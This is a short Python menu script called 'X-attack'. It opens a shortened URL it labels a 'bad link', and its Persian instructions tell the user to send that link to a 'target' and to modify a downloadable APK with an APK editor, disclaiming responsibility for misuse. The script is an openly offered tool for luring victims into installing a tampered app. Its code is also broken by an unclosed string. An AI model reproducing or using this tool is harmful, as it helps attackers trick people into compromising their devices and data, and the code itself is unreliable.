import webbrowser
import time
from os import system
system("python3 -m pip install colorama")
system("clear")   
print("Rubika: @bio_X62
print('                                  ______          ______')
print('                                  \     \        /     /')
print('                                   \     \      /     / ')
print('                                    \     \    /     /')
print('                                     \     \  /     /')
print('                                      \     \/     /')
print('                                       \    /\    / ')
print('                                        \  /  \  /')
print('                                         \/    \/')
print('                                         /\    /\ ')
print('                                        /  \  /  \ ')
print('                                       /    \/    \ ')
print('                                      /     /\     \ ')
print('                                     /     /  \     \ ')
print('                                    /     /    \     \ ')
print('                                   /     /      \     \ ')
print('                                  /_____/        \_____\ ')
print('1:link')
print('2:instructions')
print('3:VPN')
print('4:EXIT')
text = input("Selection:")

if text == "1":
    time.sleep(3)
    system("clear") 
    print('                                  ______          ______')
    print('                                  \     \        /     /')
    print('                                   \     \      /     / ')
    print('                                    \     \    /     /')
    print('                                     \     \  /     /')
    print('                                      \     \/     /')
    print('                                       \    /\    / ')
    print('                                        \  /  \  /')
    print('                                         \/    \/')
    print('                                         /\    /\ ')
    print('                                        /  \  /  \ ')
    print('                                       /    \/    \ ')
    print('                                      /     /\     \ ')
    print('                                     /     /  \     \ ')
    print('                                    /     /    \     \ ')
    print('                                   /     /      \     \ ')
    print('                                  /_____/        \_____\ ')
    print('__________link__________')
    webbrowser.open("https://tinyurl.com/uppdatesnew")
    print('bad link:')
    print('https://tinyurl.com/uppdatesnew')
    print('1:link')
    print('2:instructions')
    print('3:VPN')
    print('4:EXIT')
    text = input("Selection:")
if text == '2':
    	time.sleep(3)
    	system("clear") 
    	print('                                  ______          ______')
    	print('                                  \     \        /     /')
    	print('                                   \     \      /     / ')
    	print('                                    \     \    /     /')
    	print('                                     \     \  /     /')
    	print('                                      \     \/     /')
    	print('                                       \    /\    / ')
    	print('                                        \  /  \  /')
    	print('                                         \/    \/')
    	print('                                         /\    /\ ')
    	print('                                        /  \  /  \ ')
    	print('                                       /    \/    \ ')
    	print('                                      /     /\     \ ')
    	print('                                     /     /  \     \ ')
    	print('                                    /     /    \     \ ')
    	print('                                   /     /      \     \ ')
    	print('                                  /_____/        \_____\ ')
    	print('_________instructions__________')
    	print('hi welcome to the X-attack')
    	print('سلام به ایکس اتک خوش اومدید')
    	print ('استفاده نادرست از گیت برعهده خودتون می باشد.')
    	print('برای استفاده لینک را کپی کنید و به تارگت بدهید و همچنین می توانید apk را دانلود کنید و با اپک ادیتور آن را تغییر دهید.')
    	print('1:link')
    	print('2:instructions')
    	print('3:VPN')
    	print('4:EXIT')
    	text = input("Selection:")

if text == '3':
	system("clear") 
	print('__________VPN__________')
	print('مثلا می خوای بهت vpn بدم؟')
	print('برو گوگل بزن swing vpn نصب کن.')
	print('بعد برو لینک رو باز کن اپ رو دان کن.')
	print('1:link')
	print('2:instructions')
	print('3:VPN')
	print('4:EXIT')
	text = input("Selection:")

if text == '4':
	system("clear")
	print('حتما این اسکریپت بروز میشه و کلی چیز بهش اضافه میشه.')
